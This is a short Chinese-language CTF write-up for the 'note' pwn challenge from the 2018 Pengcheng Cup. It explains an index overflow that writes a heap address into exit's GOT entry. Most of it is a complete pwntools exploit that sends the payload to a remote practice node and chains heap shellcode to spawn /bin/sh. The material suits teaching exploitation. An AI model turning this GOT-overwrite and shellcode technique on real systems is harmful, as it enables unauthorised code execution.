鹏城杯_2018_note

首先，检查一下程序的保护机制

然后，我们用IDA分析一下，在edit功能里，index的值可以被nptr溢出覆盖，因此，我们可以控制index的值，这样，我们就可以在GOT里写入一个堆地址。

由于没有开启NX保护，我们只需要再在堆里布置shellcode即可。

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
#sh = process('./2018_note')
sh = remote('node3.buuoj.cn',28075)

def add(index,size,content):
   sh.sendline('1')
   sleep(0.01)
   sh.sendline(str(index))
   sleep(0.01)
   sh.sendline(size)
   sleep(0.01)
   sh.sendline(content)

#溢出覆盖index，使得heap[i]对应exit的got表，这样就能将exit的got表修改为一个heap地址
payload = '13'.ljust(0xA,'\x00') + p32(0xFFFFFFF8)
sc1 = asm('''mov rax,0x0068732f6e69622f
             jmp $+0x16
          ''')
add(0,payload,sc1)
sc2 = asm('''push rax
             xor rax,rax
             mov al,0x3B
             mov rdi,rsp
             jmp $+0x17
          ''')
add(1,'13',sc2)

sc3 = asm('''xor rsi,rsi
             xor rdx,rdx
             syscall
          ''')
add(2,'13',sc3)
#getshell
sh.sendline('5')

sh.interactive()